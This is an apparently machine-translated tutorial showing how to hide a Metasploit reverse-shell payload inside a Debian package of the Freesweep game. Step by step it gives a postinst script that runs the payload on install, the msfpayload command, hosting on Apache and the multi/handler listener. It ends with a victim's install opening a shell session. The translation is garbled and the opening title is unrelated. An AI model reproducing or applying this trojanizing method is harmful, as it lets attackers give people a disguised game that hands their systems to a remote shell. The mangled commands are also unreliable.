How to decrypt file Wikileaks sure insurance.aes256
[Metasploit] Linux Trojan infecting
[Metasploit By: Shell Root]
, which became a payload into an executable file to infect Windows, now we will do mime, but to infect Linux.
To avoid suspicion downloading a game, in this case
"Freesweep" to then infected with the payload.
Reading state information ...
Done The following packages will be upgraded:
freesweep 1 upgraded, 0 newly installed, 0 to remove and 183 not upgraded. 39.2 kB
need to download files. be used 172KB of additional disk space after this operation. Des mode
download only shellroot @ shellroot-desktop: ~ $
Create a folder where the files remain organized manner. In this case, will / home / shellroot /
shellroot @ shellroot-desktop: ~ $ mkdir / home / shellroot / Trojan shellroot @ shellroot-desktop: ~ $
Now the file you downloaded to start the move inside the folder you just created
(
/ home / shellroot / Trojan ) . shellroot @ shellroot-desktop: ~ $ sudo mv / var/cache/apt/archives/freesweep_0.90-2_i386.deb / home / shellroot / Trojan
shellroot @ shellroot-desktop: ~ $
We position ourselves within the folder / home / shellroot / Trojan modifcamos
and folder permissions.
shellroot @ shellroot-desktop: ~ $ cd / home / shellroot / Trojan
shellroot @ shellroot-desktop: ~ / Trojan $ chmod 777 / home / shellroot / Trojan
shellroot @ shellroot-desktop: ~ / Trojan $
Unzip
file-2_i386.deb freesweep_0.90
within
folder / home / shellroot / Trojan
to add the PAYLOAD infection.
shellroot @ shellroot-desktop: ~ / $ dpkg-x Trojan freesweep_0.90-2_i386.deb @ shellroot shellroot
Game-desktop: ~ / Trojan $
Now create a folder called Debian, within it create 2 files.
control postinst
shellroot @ shellroot-desktop: ~ / $ mkdir Game Trojan / DEBIAN
shellroot @ shellroot-desktop: ~ / $ cd Game Trojan / DEBIAN
shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $
Within the control file, we will post the following information:
Package: freesweep Version: 0.90 to 1 Section: Games & Fun Priority: Medium
Architecture: i386
Created: Ubuntu MOTU Developers (ubuntu-motu @ lists. ubuntu.com)
Description: Minesweeper is an implementation of the popular minesweeper game, trying to find all the mines without igniting any, based on suggestions given by the team.
postinst now within the file, put a script for the execution of our infected file.
# / bin / sh
sudo chmod 2755 / usr / games / freesweep_scores & & / usr / games / freesweep_scores & / usr / games / freesweep &
Now create the Trojan with linux/x86/shell/reverse_tcp PAYLOAD, give the parameters and lport Lhoste and ubucacion the infected file.
shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $ msfpayload linux/x86/shell/reverse_tcp Lhoste = 192,168,142,137 lport = 1234 X> / home / shellroot / Trojan / Game / usr / games / freesweep_scores
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp Length: 50
Options: Lhoste = 192,168,142,137, lport = 1234 shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $
modifcamos Now postinst file permissions , and build the file again who is supposedly the "Game".
shellroot @ shellroot-desktop: ~ / Trojan / Game / postinst chmod 755 $ DEBIAN
shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $ dpkg-deb - build / home / shellroot / Trojan / Game /
dpkg-deb: building package `freesweep 'to` / home / shellroot / Trojan / Juego.deb'.
shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $
Re-contruccion
Juego.deb create the file which must change for freesweep.deb, so we move to the folder
/ home / shellroot / Trojan
, then, we will move to the Web server root for your next shock and infection.
shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $ cd / home / shellroot / Trojan
shellroot @ shellroot-desktop: ~ / Trojan $ mv Juego.deb freesweep.deb
shellroot @ shellroot-desktop: ~ / Trojan freesweep.deb $ sudo cp / var / www /
[sudo] password for shellroot:
shellroot @ shellroot-desktop: ~ / Trojan $
started the Apache Server
shellroot @ shellroot-desktop: ~ / $ Trojan sudo / etc/init.d/apache2 start
* Starting web server apache2 apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
httpd (pid 1576) already running
[OK]
shellroot @ shellroot-desktop: ~ / Trojan $
Now as when we did with Windows, we use the Auxiliary
multi / handler
, set in the same way that when we create the PAYLOAD and wait for the victim download and run the infected file.
shellroot @ shellroot-desktop: ~ $ sudo msfcli exploit / multi / handler PAYLOAD = linux/x86/shell/reverse_tcp Lhoste = 192,168,142,137
lport = 1234 E [sudo] password for shellroot:
[*] Please wait while we load the module tree ...
[*] Starting the payload handler ...
[*] Started on port 1234 reverse handler
Now suppose that we are the victim and download the file.
hacklab @ hacklab-desktop: ~ $ wget http://192.168.142.137/freesweep.deb
- 2010-01-21 23:36:27 - Connecting
http://192.168.142.137/freesweep.deb to 192.168.142.137:80 ... connected.
HTTP request sent, awaiting response ...
200 OK Length: 39,214 (38K) [application / x-debian-package]
Saving "freesweep.deb"
100 %[=================== ====================================>] 39,214 --.- K / s in 0s
21/01/2010 23:36:29 (93.0 MB / s) - `freesweep.deb 'saved [39214/39214]
hacklab @ hacklab-desktop: ~ $
After downloading the file, installed it.
hacklab @ hacklab-desktop: ~ $ sudo dpkg-i freesweep.deb
Now look at the multi / handler Voala
and a session of
Meterpreter
[*] Sending Stage (36 bytes)
[* ] Command shell session 1 OPEN (192.168.142.137:1234 -> 192.168.142.140:41233)